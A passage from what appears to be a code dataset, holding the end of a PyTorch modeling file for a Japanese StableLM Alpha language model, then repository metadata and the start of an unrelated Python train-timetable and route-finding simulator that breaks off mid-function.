module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)\n if module.padding_idx is not None:\n module.weight.data[module.padding_idx].zero_()\n elif isinstance(module, nn.LayerNorm):\n if module.bias is not None:\n module.bias.data.zero_()\n if module.weight is not None:\n module.weight.data.fill_(1.0)\n\n def _set_gradient_checkpointing(self, module, value=False):\n if isinstance(module, JapaneseStableLMAlphaModel):\n module.gradient_checkpointing = value\n\n\nclass JapaneseStableLMAlphaModel(JapaneseStableLMAlphaPreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n self.config = 
config\n\n self.embed_in = nn.Embedding(config.vocab_size, config.hidden_size)\n self.layers = nn.ModuleList(\n [DecoderLayer(config) for _ in range(config.num_hidden_layers)]\n )\n self.final_layer_norm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n\n self.gradient_checkpointing = False\n\n # Initialize weights and apply final processing\n self.post_init()\n\n def get_input_embeddings(self):\n return self.embed_in\n\n def set_input_embeddings(self, value):\n self.embed_in = value\n\n def forward(\n self,\n input_ids: Optional[torch.LongTensor] = None,\n attention_mask: Optional[torch.FloatTensor] = None,\n position_ids: Optional[torch.LongTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n past_key_values: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple, BaseModelOutputWithPast]:\n r\"\"\"\n past_key_values (`tuple(tuple(torch.FloatTensor))` of length `config.n_layers` with each tuple having 4 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):\n Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.\n If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that\n don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all\n `decoder_input_ids` of shape `(batch_size, sequence_length)`.\n use_cache (`bool`, *optional*):\n If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see\n `past_key_values`).\n \"\"\"\n output_attentions = (\n output_attentions if output_attentions is not None else self.config.output_attentions\n )\n output_hidden_states = (\n output_hidden_states\n if output_hidden_states is not None\n else self.config.output_hidden_states\n )\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n use_cache = use_cache if use_cache is not None else self.config.use_cache\n\n if input_ids is not None and inputs_embeds is not None:\n raise ValueError(\n \"You cannot specify both input_ids and inputs_embeds at the same time\"\n )\n elif input_ids is not None:\n input_shape = input_ids.size()\n elif inputs_embeds is not None:\n input_shape = inputs_embeds.size()[:-1]\n else:\n raise ValueError(\"You have to specify either input_ids or inputs_embeds\")\n\n batch_size, seq_length = input_shape\n\n if past_key_values is None:\n past_length = 0\n past_key_values = tuple([None] * self.config.num_hidden_layers)\n else:\n past_length = past_key_values[0][0].size(-2)\n\n if position_ids is None:\n device = input_ids.device if input_ids is not None else inputs_embeds.device\n position_ids = torch.arange(\n past_length, seq_length + past_length, dtype=torch.long, device=device\n )\n position_ids = position_ids.unsqueeze(0).view(-1, seq_length)\n else:\n position_ids = position_ids.view(-1, seq_length).long()\n\n # Attention mask.\n if attention_mask is not None:\n assert batch_size > 0, \"batch_size has to be defined and > 0\"\n attention_mask = attention_mask.view(batch_size, -1)\n # We create a 3D attention mask from a 2D tensor mask.\n # Sizes are [batch_size, 1, 1, to_seq_length]\n # So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]\n # this 
attention mask is more simple than the triangular masking of causal attention\n # used in OpenAI GPT, we just need to prepare the broadcast dimension here.\n attention_mask = attention_mask[:, None, None, :]\n\n # Since attention_mask is 1.0 for positions we want to attend and 0.0 for\n # masked positions, this operation will create a tensor which is 0.0 for\n # positions we want to attend and the dtype's smallest value for masked positions.\n # Since we are adding it to the raw scores before the softmax, this is\n # effectively the same as removing these entirely.\n attention_mask = attention_mask.to(dtype=self.dtype) # fp16 compatibility\n attention_mask = (1.0 - attention_mask) * torch.finfo(self.dtype).min\n\n # Prepare head mask if needed\n # 1.0 in head_mask indicate we keep the head\n # attention_probs has shape bsz x n_heads x N x N\n # input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]\n # and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]\n head_mask = self.get_head_mask(head_mask, self.config.num_hidden_layers)\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_in(input_ids)\n\n hidden_states = inputs_embeds\n\n if self.gradient_checkpointing and self.training:\n if use_cache:\n logger.warning(\n \"`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`...\"\n )\n use_cache = False\n\n presents = () if use_cache else None\n all_attentions = () if output_attentions else None\n all_hidden_states = () if output_hidden_states else None\n for i, (layer, layer_past) in enumerate(zip(self.layers, past_key_values)):\n if output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n if self.gradient_checkpointing and self.training:\n\n def create_custom_forward(module):\n def custom_forward(*inputs):\n # None for layer_past\n return module(*inputs, use_cache, None, output_attentions)\n\n return custom_forward\n\n outputs = torch.utils.checkpoint.checkpoint(\n create_custom_forward(layer),\n hidden_states,\n attention_mask,\n position_ids,\n head_mask[i],\n )\n else:\n outputs = layer(\n hidden_states,\n attention_mask=attention_mask,\n position_ids=position_ids,\n head_mask=head_mask[i],\n layer_past=layer_past,\n use_cache=use_cache,\n output_attentions=output_attentions,\n )\n hidden_states = outputs[0]\n if use_cache is True:\n presents = presents + (outputs[1],)\n if output_attentions:\n all_attentions = all_attentions + (outputs[2 if use_cache else 1],)\n\n hidden_states = self.final_layer_norm(hidden_states)\n # Add last hidden state\n if output_hidden_states:\n all_hidden_states = all_hidden_states + (hidden_states,)\n\n if not return_dict:\n return tuple(\n v\n for v in [hidden_states, presents, all_hidden_states, all_attentions]\n if v is not None\n )\n\n return BaseModelOutputWithPast(\n last_hidden_state=hidden_states,\n past_key_values=presents,\n hidden_states=all_hidden_states,\n attentions=all_attentions,\n )\n\n\nclass DecoderLayer(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.use_parallel_residual = config.use_parallel_residual\n self.input_layernorm = nn.LayerNorm(\n config.hidden_size,\n eps=config.layer_norm_eps,\n elementwise_affine=False,\n )\n self.post_attention_layernorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)\n self.attention = Attention(config)\n self.mlp = MLP(config)\n\n def forward(\n self,\n hidden_states: Optional[torch.FloatTensor],\n attention_mask: 
Optional[torch.FloatTensor] = None,\n position_ids: Optional[torch.LongTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n use_cache: Optional[bool] = False,\n layer_past: Optional[Tuple[torch.Tensor]] = None,\n output_attentions: Optional[bool] = False,\n ):\n attention_layer_outputs = self.attention(\n self.input_layernorm(hidden_states),\n attention_mask=attention_mask,\n position_ids=position_ids,\n layer_past=layer_past,\n head_mask=head_mask,\n use_cache=use_cache,\n output_attentions=output_attentions,\n )\n attn_output = attention_layer_outputs[\n 0\n ] # output_attn: attn_output, present, (attn_weights)\n outputs = attention_layer_outputs[1:]\n\n mlp_output = self.mlp(self.post_attention_layernorm(hidden_states))\n hidden_states = hidden_states + mlp_output + attn_output\n\n if use_cache:\n outputs = (hidden_states,) + outputs # hidden_states, present, (attn_weights)\n else:\n outputs = (hidden_states,) + outputs[1:] # hidden_states, (attn_weights)\n\n return outputs\n\n\nclass MLP(nn.Module):\n def __init__(self, config: JapaneseStableLMAlphaConfig):\n super().__init__()\n hidden_size = config.hidden_size\n multiple_of = 256\n ff_dim = int(8 * hidden_size / 3)\n intermediate_size = multiple_of * ((ff_dim + multiple_of - 1) // multiple_of)\n\n self.packed_input_proj = torch.nn.Linear(hidden_size, 2 * intermediate_size, bias=False)\n self.out_proj = nn.Linear(intermediate_size, hidden_size, bias=False)\n self.act = nn.SiLU()\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n ff, ff_gate = self.packed_input_proj(x).chunk(2, dim=-1)\n return self.out_proj(ff * self.act(ff_gate))\n\n\nclass RotaryEmbedding(torch.nn.Module):\n \"\"\"Based on Tri Dao's XPos: https://github.com/HazyResearch/flash-attention/blob/main/flash_attn/layers/rotary.py\"\"\"\n\n def __init__(\n self,\n dim: int,\n max_position_embeddings: int,\n base: int = 10_000,\n scale_base: int = 512,\n device: str = None,\n ):\n super().__init__()\n self.dim = dim\n self.seq_len_cached = max_position_embeddings\n\n # Set up `inv_freq` term\n inv_freq = 1.0 / (\n base ** (torch.arange(0, dim, 2, device=device, dtype=torch.float32) / dim)\n )\n self.register_buffer(\"inv_freq\", inv_freq)\n\n # Set up `scale` term\n self.scale_base = scale_base\n scale = (\n (torch.arange(0, dim, 2, device=device, dtype=torch.float32) + 0.4 * dim) / (1.4 * dim)\n if scale_base is not None\n else None\n )\n self.register_buffer(\"scale\", scale)\n\n # Seet up `cos..` and `sin...` cache terms\n t = torch.arange(self.seq_len_cached, device=device, dtype=torch.float32)\n freqs = torch.outer(t, self.inv_freq)\n # freqs = torch.cat((freqs, freqs), dim=-1)\n seq_range = torch.arange(\n self.seq_len_cached, dtype=self.scale.dtype, device=self.scale.device\n )\n power = (seq_range - self.seq_len_cached // 2) / self.scale_base\n scale_cached = self.scale.to(device=power.device) ** power.unsqueeze(-1)\n # scale_cached = torch.cat((scale_cached, scale_cached), dim=-1)\n self.register_buffer(\"cos_cached\", torch.cos(freqs) * scale_cached, persistent=False)\n self.register_buffer(\"sin_cached\", torch.sin(freqs) * scale_cached, persistent=False)\n self.register_buffer(\"cos_k_cached\", torch.cos(freqs) / scale_cached, persistent=False)\n self.register_buffer(\"sin_k_cached\", torch.sin(freqs) / scale_cached, persistent=False)\n\n def forward(self, x, seq_len=None):\n if seq_len > self.seq_len_cached:\n self.seq_len_cached = seq_len\n t = torch.arange(seq_len, device=x.device, dtype=torch.float32)\n freqs = torch.outer(t, 
self.inv_freq)\n freqs = torch.cat((freqs, freqs), dim=-1)\n seq_range = torch.arange(\n self.seq_len_cached, dtype=self.scale.dtype, device=self.scale.device\n )\n power = (seq_range - self.seq_len_cached // 2) / self.scale_base\n scale_cached = self.scale.to(device=power.device) ** power.unsqueeze(-1)\n scale_cached = torch.cat((scale_cached, scale_cached), dim=-1)\n self.register_buffer(\"cos_cached\", torch.cos(freqs) * scale_cached, persistent=False)\n self.register_buffer(\"sin_cached\", torch.sin(freqs) * scale_cached, persistent=False)\n self.register_buffer(\"cos_k_cached\", torch.cos(freqs) / scale_cached, persistent=False)\n self.register_buffer(\"sin_k_cached\", torch.sin(freqs) / scale_cached, persistent=False)\n return (\n self.cos_cached[:seq_len, ...],\n self.sin_cached[:seq_len, ...],\n self.cos_k_cached[:seq_len, ...],\n self.sin_k_cached[:seq_len, ...],\n )\n\n\ndef rotate_half(x):\n x1, x2 = x.chunk(2, dim=-1)\n return torch.cat((-x2, x1), dim=-1)\n\n\ndef apply_rotary_pos_emb(q, k, cos, sin, position_ids, cos_k=None, sin_k=None):\n \"\"\"\n q, k: [bs, num_heads, seq_len, rot_dim]\n cos, sin: [seq_len, rot_dim / 2]\n position_ids: [bs, seq_len]\n \"\"\"\n # print(f\"q: {q.shape}, k: {k.shape}, cos: {cos.shape}, sin: {sin.shape}, position_ids: {position_ids.shape}\")\n import einops\n\n cos = einops.repeat(cos, \"s r -> s (2 r)\")\n sin = einops.repeat(sin, \"s r -> s (2 r)\")\n cos_k = einops.repeat(cos_k, \"s r -> s (2 r)\")\n sin_k = einops.repeat(sin_k, \"s r -> s (2 r)\")\n cos = cos[position_ids].unsqueeze(1) # [bs, 1, seq_len, rot_dim]\n sin = sin[position_ids].unsqueeze(1) # [bs, 1, seq_len, rot_dim]\n cos_k = cos_k[position_ids].unsqueeze(1) # [bs, 1, seq_len, rot_dim]\n sin_k = sin_k[position_ids].unsqueeze(1) # [bs, 1, seq_len, rot_dim]\n\n q_embed = (q * cos) + (rotate_half(q) * sin)\n k_embed = (k * cos_k) + (rotate_half(k) * sin_k)\n return q_embed, k_embed\n\n\nclass Attention(nn.Module):\n def __init__(self, config):\n super().__init__()\n self.num_attention_heads = config.num_attention_heads\n self.hidden_size = config.hidden_size\n if self.hidden_size % self.num_attention_heads != 0:\n raise ValueError(\n \"The hidden size is not divisble by the number of attention heads! 
Make sure to update them\"\n )\n self.head_size = self.hidden_size // self.num_attention_heads\n\n max_positions = config.max_position_embeddings\n self.register_buffer(\n \"bias\",\n torch.tril(torch.ones((max_positions, max_positions), dtype=torch.bool)).view(\n 1, 1, max_positions, max_positions\n ),\n persistent=False,\n )\n self.register_buffer(\"masked_bias\", torch.tensor(-1e9), persistent=False)\n\n self.rotary_ndims = int(self.head_size * config.rotary_pct)\n self.rotary_emb = RotaryEmbedding(\n self.rotary_ndims,\n max_position_embeddings=config.max_position_embeddings,\n base=config.rotary_emb_base,\n scale_base=config.rotary_scale_base,\n )\n\n self.register_buffer(\n \"norm_factor\",\n torch.sqrt(torch.tensor(self.head_size, dtype=torch.float32)).to(\n torch.get_default_dtype()\n ),\n persistent=False,\n )\n\n self.query_key_value = nn.Linear(self.hidden_size, 3 * self.hidden_size, bias=False)\n self.dense = nn.Linear(self.hidden_size, self.hidden_size, bias=False)\n\n def forward(\n self,\n hidden_states: torch.FloatTensor,\n attention_mask: torch.FloatTensor,\n position_ids: torch.LongTensor,\n head_mask: Optional[torch.FloatTensor] = None,\n layer_past: Optional[Tuple[torch.Tensor]] = None,\n use_cache: Optional[bool] = False,\n output_attentions: Optional[bool] = False,\n ):\n has_layer_past = layer_past is not None\n\n # Compute QKV\n # Attention heads [batch, seq_len, hidden_size]\n # --> [batch, seq_len, (np * 3 * head_size)]\n qkv = self.query_key_value(hidden_states)\n\n # [batch, seq_len, (num_heads * 3 * head_size)]\n # --> [batch, seq_len, num_heads, 3 * head_size]\n new_qkv_shape = qkv.size()[:-1] + (self.num_attention_heads, 3 * self.head_size)\n qkv = qkv.view(*new_qkv_shape)\n\n # [batch, seq_len, num_attention_heads, 3 * head_size] --> 3 [batch, num_attention_heads, seq_len, head_size]\n query = qkv[..., : self.head_size].permute(0, 2, 1, 3)\n key = qkv[..., self.head_size : 2 * self.head_size].permute(0, 2, 1, 3)\n value = qkv[..., 2 * self.head_size :].permute(0, 2, 1, 3)\n\n # Compute rotary embeddings on rotary_ndims\n query_rot = query[..., : self.rotary_ndims]\n query_pass = query[..., self.rotary_ndims :]\n key_rot = key[..., : self.rotary_ndims]\n key_pass = key[..., self.rotary_ndims :]\n\n # Compute token offset for rotary embeddings (when decoding)\n kv_seq_len = key.shape[-2]\n if has_layer_past:\n kv_seq_len += layer_past[0].shape[-2]\n\n # Add rotary embeddings to query and key\n # TODO: Check if using xpos\n cos, sin, cos_k, sin_k = self.rotary_emb(value, seq_len=kv_seq_len)\n query, key = apply_rotary_pos_emb(\n query_rot, key_rot, cos, sin, position_ids, cos_k=cos_k, sin_k=sin_k\n )\n\n query = torch.cat((query, query_pass), dim=-1)\n key = torch.cat((key, key_pass), dim=-1)\n\n # Cache QKV values\n if has_layer_past:\n past_key = layer_past[0]\n past_value = layer_past[1]\n key = torch.cat((past_key, key), dim=-2)\n value = torch.cat((past_value, value), dim=-2)\n present = (key, value) if use_cache else None\n\n # Compute attention\n attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask)\n\n # Merge attn_head_size dim and num_attn_heads dim into hidden dim\n # [bs, seq_len, num_attention_heads, attn_head_size]\n attn_output = attn_output.permute(0, 2, 1, 3).contiguous()\n attn_output = attn_output.view(\n attn_output.size(0), attn_output.size(1), self.num_attention_heads * self.head_size\n )\n\n attn_output = self.dense(attn_output)\n\n outputs = (attn_output, present)\n if output_attentions:\n outputs += 
(attn_weights,)\n\n return outputs\n\n def _attn(self, query, key, value, attention_mask=None, head_mask=None):\n # q, k, v: [bs, num_attention_heads, seq_len, attn_head_size]\n # compute causal mask from causal mask buffer\n\n batch_size, num_attention_heads, query_length, attn_head_size = query.size()\n key_length = key.size(-2)\n\n causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length]\n\n query = query.view(batch_size * num_attention_heads, query_length, attn_head_size)\n key = key.view(batch_size * num_attention_heads, key_length, attn_head_size)\n attn_scores = torch.zeros(\n batch_size * num_attention_heads,\n query_length,\n key_length,\n dtype=query.dtype,\n device=key.device,\n )\n attn_scores = torch.baddbmm(\n attn_scores,\n query,\n key.transpose(1, 2),\n beta=1.0,\n alpha=(\n torch.tensor(1.0, dtype=self.norm_factor.dtype, device=self.norm_factor.device)\n / self.norm_factor\n ),\n )\n attn_scores = attn_scores.view(batch_size, num_attention_heads, query_length, key_length)\n\n mask_value = torch.finfo(attn_scores.dtype).min\n # Need to be a tensor, otherwise we get error: `RuntimeError: expected scalar type float but found double`.\n # Need to be on the same device, otherwise `RuntimeError: ..., x and y to be on the same device`\n mask_value = torch.tensor(mask_value, dtype=attn_scores.dtype, device=attn_scores.device)\n attn_scores = torch.where(causal_mask, attn_scores, mask_value)\n\n if attention_mask is not None:\n # Apply the attention mask\n attn_scores = attn_scores + attention_mask\n\n # NOTE: Upcast to float32\n attn_weights = nn.functional.softmax(attn_scores, dim=-1, dtype=torch.float32).type_as(\n value\n )\n\n # Mask heads if we want to\n if head_mask is not None:\n attn_weights = attn_weights * head_mask\n\n attn_output = torch.matmul(attn_weights, value)\n return attn_output, attn_weights\n\n\ndef attention_mask_func(attention_scores, ltor_mask):\n attention_scores.masked_fill_(~ltor_mask, torch.finfo(attention_scores.dtype).min)\n return attention_scores\n\n\nclass JapaneseStableLMAlphaForCausalLM(JapaneseStableLMAlphaPreTrainedModel):\n _tied_weights_keys = [\"embed_out.weight\"]\n\n def __init__(self, config):\n super().__init__(config)\n\n self.transformer = JapaneseStableLMAlphaModel(config)\n self.embed_out = nn.Linear(config.hidden_size, config.vocab_size, bias=False)\n\n # Initialize weights and apply final processing\n self.post_init()\n\n def get_output_embeddings(self):\n return self.embed_out\n\n def set_output_embeddings(self, new_embeddings):\n self.embed_out = new_embeddings\n\n def forward(\n self,\n input_ids: Optional[torch.LongTensor] = None,\n attention_mask: Optional[torch.FloatTensor] = None,\n position_ids: Optional[torch.LongTensor] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n head_mask: Optional[torch.FloatTensor] = None,\n past_key_values: Optional[Tuple[Tuple[torch.FloatTensor]]] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple, CausalLMOutputWithPast]:\n r\"\"\"\n Example:\n\n ```python\n >>> import torch\n >>> from transformers import LlamaTokenizer, JapaneseStableLMAlphaForCausalLM, JapaneseStableLMAlphaConfig\n\n >>> tokenizer = LlamaTokenizer.from_pretrained(\"novelai/nerdstash-tokenizer-v1\")\n >>> config = JapaneseStableLMAlphaConfig.from_pretrained(\"stabilityai/stablelm-ja-base-alpha-7b\")\n 
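# NOTE (editor): `_attn` above flattens [batch, heads, len, head_size] into
# [batch*heads, len, head_size] and calls torch.baddbmm with alpha=1/norm_factor,
# which is just the standard 1/sqrt(head_size) scaling of the query-key scores.
# A hedged equivalence check with toy shapes (all sizes and values assumed):

import math
import torch

q = torch.randn(8, 5, 16)  # [batch*heads, query_len, head_size]
k = torch.randn(8, 5, 16)
scores_baddbmm = torch.baddbmm(torch.zeros(8, 5, 5), q, k.transpose(1, 2),
                               beta=1.0, alpha=1.0 / math.sqrt(16))
scores_plain = torch.matmul(q, k.transpose(1, 2)) / math.sqrt(16)
assert torch.allclose(scores_baddbmm, scores_plain, atol=1e-5)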
>>> config.is_decoder = True\n >>> model = JapaneseStableLMAlphaForCausalLM.from_pretrained(\"stabilityai/stablelm-ja-base-alpha-7b\", config=config, trust_remote_code=True)\n\n >>> inputs = tokenizer(\"日本語の美しいところは、\", return_tensors=\"pt\")\n >>> outputs = model(**inputs)\n\n >>> prediction_logits = outputs.logits\n ```\"\"\"\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n outputs = self.transformer(\n input_ids,\n attention_mask=attention_mask,\n position_ids=position_ids,\n head_mask=head_mask,\n inputs_embeds=inputs_embeds,\n past_key_values=past_key_values,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n )\n\n hidden_states = outputs[0]\n lm_logits = self.embed_out(hidden_states)\n\n lm_loss = None\n if labels is not None:\n # move labels to correct device to enable model parallelism\n labels = labels.to(lm_logits.device)\n # we are doing next-token prediction; shift prediction scores and input ids by one\n shift_logits = lm_logits[:, :-1, :].contiguous()\n labels = labels[:, 1:].contiguous()\n loss_fct = CrossEntropyLoss()\n lm_loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), labels.view(-1))\n\n if not return_dict:\n output = (lm_logits,) + outputs[1:]\n return ((lm_loss,) + output) if lm_loss is not None else output\n\n return CausalLMOutputWithPast(\n loss=lm_loss,\n logits=lm_logits,\n past_key_values=outputs.past_key_values,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n def prepare_inputs_for_generation(\n self, input_ids, past_key_values=None, attention_mask=None, inputs_embeds=None, **kwargs\n ):\n input_shape = input_ids.shape\n\n # cut decoder_input_ids if past is used\n if past_key_values and past_key_values[0] is not None:\n input_ids = input_ids[:, -1:]\n\n position_ids = kwargs.get(\"position_ids\", None)\n if attention_mask is not None and position_ids is None:\n # create position_ids on the fly for batch generation\n position_ids = attention_mask.long().cumsum(-1) - 1\n position_ids.masked_fill_(attention_mask == 0, 1)\n if past_key_values:\n position_ids = position_ids[:, -1].unsqueeze(-1)\n\n # if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly\n if attention_mask is None:\n attention_mask = input_ids.new_ones(input_shape)\n\n # if `inputs_embeds` are passed, we only want to use them in the 1st generation step\n if inputs_embeds is not None and past_key_values is None:\n model_inputs = {\"inputs_embeds\": inputs_embeds}\n else:\n model_inputs = {\"input_ids\": input_ids}\n\n model_inputs.update(\n {\n \"attention_mask\": attention_mask,\n \"past_key_values\": past_key_values,\n \"position_ids\": position_ids,\n }\n )\n\n return model_inputs\n\n def _reorder_cache(self, past_key_values, beam_idx):\n reordered_past = ()\n for layer_past in past_key_values:\n reordered_past += (\n tuple(past_state.index_select(0, beam_idx) for past_state in layer_past[:2])\n + layer_past[2:],\n )\n return reordered_past\n","repo_name":"turingmotors/heron","sub_path":"heron/models/git_llm/git_japanese_stablelm_alpha/modeling_japanese_stablelm_alpha.py","file_name":"modeling_japanese_stablelm_alpha.py","file_ext":"py","file_size_in_byte":29006,"program_lang":"python","lang":"en","doc_type":"code","stars":101,"dataset":"github-code","pt":"68"} +{"seq_id":"11385706467","text":"import datetime\nfrom collections import defaultdict\nfrom trainsimulator.util import 
sort_time, verify_time_format, convert_to_datetime, convert_to_timedelta\nfrom trainsimulator.exception import (\n InvalidTimeTable, InvalidNetwork, InvalidStation, InvalidTimeFormat)\n\n\ndef time_span_decorator(func):\n def wrapper(*args):\n time_sequence = args[1]\n duration = args[2]\n arrival_time = args[3]\n time_sequence = convert_to_datetime(time_sequence)\n duration = convert_to_timedelta(duration)\n arrival_time = convert_to_datetime(arrival_time)\n\n return func(args[0], time_sequence, duration, arrival_time)\n\n return wrapper\n\n\nclass Journey(object):\n \"\"\"\n This class defines the connection between two nodes in the network as Journey, and stores the timetable information\n such as departure time and duration.\n \n Note: self._timetable is a dictionary in the format of departure_time: [duration]\n \"\"\"\n\n def __init__(self, start_station, end_station):\n self._start_station = start_station\n self._end_station = end_station\n self._timetable = {}\n self._departure_time = None\n\n @property\n def timetable(self):\n return self._timetable\n\n @timetable.setter\n def timetable(self, time_table):\n self._timetable = self._uniformat_timetable(time_table)\n\n @property\n def duration(self):\n return self.timetable['duration']\n\n @property\n def start_station(self):\n return self._start_station\n\n @property\n def end_station(self):\n return self._end_station\n\n @property\n def departure_time(self):\n if self._departure_time is None:\n self._departure_time = self._extract_departure_time()\n\n return self._departure_time\n\n def arrival_time(self, departure_time):\n if departure_time not in self.timetable.get('departure_time'):\n return\n duration = self.timetable['duration']\n departure_time_stamp = datetime.datetime.strptime(departure_time, '%H:%M')\n duration_hour, duration_min = duration.split(':')\n duration_time_stamp = datetime.timedelta(hours=int(duration_hour), minutes=int(duration_min))\n arrival_time = (departure_time_stamp + duration_time_stamp).strftime('%H:%M')\n return datetime.datetime.strptime(arrival_time, '%H:%M')\n\n def _extract_departure_time(self):\n return self.timetable['departure_time']\n\n def departure_arrival_time_table(self):\n time_table = [(departure_time, self.arrival_time(departure_time).strftime('%H:%M'))\n for departure_time in self.departure_time]\n return time_table\n\n def _uniform_time_format(self, time_str):\n if not time_str or not verify_time_format(time_str):\n return None\n\n hour, minute = time_str.split(':')\n new_format = ['0' + i if len(i) == 1 else i for i in [hour, minute]]\n return ':'.join(new_format)\n\n def _uniformat_timetable(self, time_table):\n sanitized_time_format = []\n if time_table.get('departure_time') and time_table.get('duration'):\n for time_stamp in time_table['departure_time']:\n if isinstance(time_stamp, str):\n sanitized_time_ = self._uniform_time_format(time_stamp)\n if sanitized_time_:\n sanitized_time_format.append(sanitized_time_)\n else:\n raise InvalidTimeFormat\n else:\n raise InvalidTimeFormat\n time_table['departure_time'] = sanitized_time_format\n return time_table\n else:\n raise InvalidTimeTable\n\n\nclass TrainNetwork(object):\n def __init__(self):\n \"\"\"\n This class defines the train network, and it has the methods to find all the paths, time table, shortest journey\n from one station to another, \n self.journey is the list of dictionary with format {'start_station': [journey_instances]}\n \"\"\"\n self.journey = defaultdict(list)\n self.all_station = set()\n\n def 
_journey_instance(self, start_station):\n if start_station not in self.journey:\n return\n\n return self.journey[start_station]\n\n def journey_duration(self, start_station, end_station):\n journey_instance = [i for i in self._journey_instance(start_station) if i.end_station == end_station]\n return journey_instance[0].duration if journey_instance else None\n\n def build_network_from_nodes(self, nodes):\n \"\"\"\n This method builds the network from a node/nodes with the format start_station, end_station, time_table\n \n :param nodes: list of tuples\n :return: \n \"\"\"\n try:\n if not nodes:\n raise ValueError\n\n self.all_station = set()\n for node in nodes:\n start_station, end_station, time_table = node\n journey = Journey(start_station, end_station)\n if time_table:\n journey.timetable = time_table\n self.journey[start_station].append(journey)\n self.all_station.update({start_station, end_station})\n except (ValueError, InvalidTimeTable):\n print('Invalid nodes, quit')\n raise InvalidNetwork\n\n def build_network_from_journey(self, journeys):\n \"\"\"\n This method builds the network from a list of Journey instance\n :param journeys: list of Journey instances\n :return: \n \"\"\"\n self.all_station = set()\n\n for journey in journeys:\n self.journey[journey.start_station].append(journey)\n self.all_station.update({journey.start_station, journey.end_station})\n\n def _find_next_station(self, start_station):\n if start_station not in self.journey:\n return\n journey_instances = self.journey[start_station]\n\n end_stations = [journey_instance.end_station for journey_instance in journey_instances]\n return end_stations\n\n def _arrival_time_before_departure_time(self, arrival_time, departure_time):\n time_sequence = []\n for time_stamp in [arrival_time, departure_time]:\n if isinstance(time_stamp, str) and verify_time_format(time_stamp):\n time_sequence.append(datetime.datetime.strptime(time_stamp, '%H:%M'))\n continue\n\n if isinstance(time_stamp, datetime.datetime):\n time_sequence.append(time_stamp)\n\n if len(time_sequence) == 2:\n time_difference = time_sequence[0] - time_sequence[1]\n return time_difference < datetime.timedelta(minutes=0)\n else:\n raise InvalidTimeFormat\n\n def _is_departure_station(self, station_name):\n return station_name in self.journey\n\n def _find_available_paths(self, start_station, end_station, result, results):\n \"\"\"\n This is recursive method is to find all the paths between any two stations\n :param start_station: str\n :param end_station: str\n :param result: initial value of this recursive function, which is the reference pointing to the \n initial value [start_station]\n :param results: reference to a list which stores the result\n :return: \n \"\"\"\n next_station = self._find_next_station(start_station)\n if not result or not next_station:\n return None\n\n for i in next_station:\n\n if i in result:\n continue\n if i == end_station:\n results.append(result + [i])\n continue\n result.append(i)\n temp_result = self._find_available_paths(i, end_station, result, results)\n if not temp_result:\n result.pop()\n continue\n result = temp_result\n return result[:-1]\n\n def all_valid_journey(self, start_station, end_station):\n \"\"\"\n This method is to generate all the paths from any start station to any end station, which is the \n wrapper of self._find_available_paths method\n \n :param start_station: str\n :param end_station: str\n :return: list of paths\n \"\"\"\n if start_station not in self.all_station or end_station not in self.all_station:\n 
raise InvalidStation\n\n result = [start_station]\n results = []\n self._find_available_paths(start_station, end_station, result, results)\n return results\n\n def _departure_arrival_time_table(self, start_station, end_station):\n if start_station not in self.journey:\n return\n for journey in self.journey[start_station]:\n if journey.end_station == end_station:\n return journey.departure_arrival_time_table()\n\n def _time_table_from_route(self, route):\n \"\"\"\n This method is to generate the timetable of the route\n :param route: list of station name, e.g ['A', 'B', 'E']\n :return: timetable \n \"\"\"\n trip_time_table = []\n for index, start_stop in enumerate(route[:-1]):\n next_stop = route[index + 1]\n\n time_table = self._departure_arrival_time_table(start_stop, next_stop)\n trip_time_table.append(dict(time_table))\n\n return trip_time_table\n\n def _earliest_departure_time(self, arrival_time, next_stop_timetable):\n \"\"\"\n This method is to find the earliest departure time to the next city after the train arrives the current city\n :param arrival_time: \n :param next_stop_timetable: \n :return: earliest departure time to the next city\n \"\"\"\n earliest_departure_time_ = None\n next_stop_departure_time = sort_time(list(next_stop_timetable.keys()))\n for departure_time in next_stop_departure_time:\n if self._arrival_time_before_departure_time(arrival_time, departure_time):\n earliest_departure_time_ = departure_time\n break\n\n return earliest_departure_time_.strftime('%H:%M') if earliest_departure_time_ else next_stop_departure_time[\n 0].strftime('%H:%M')\n\n @time_span_decorator\n def _time_span(self, time_sequence, duration, arrival_time):\n \"\"\"\n This method is to calculate the duration from the first city departure time to last city arrival time\n :param time_sequence: list of time \n :param duration: list of duration between adjacent stops\n :param arrival_time: arrival time 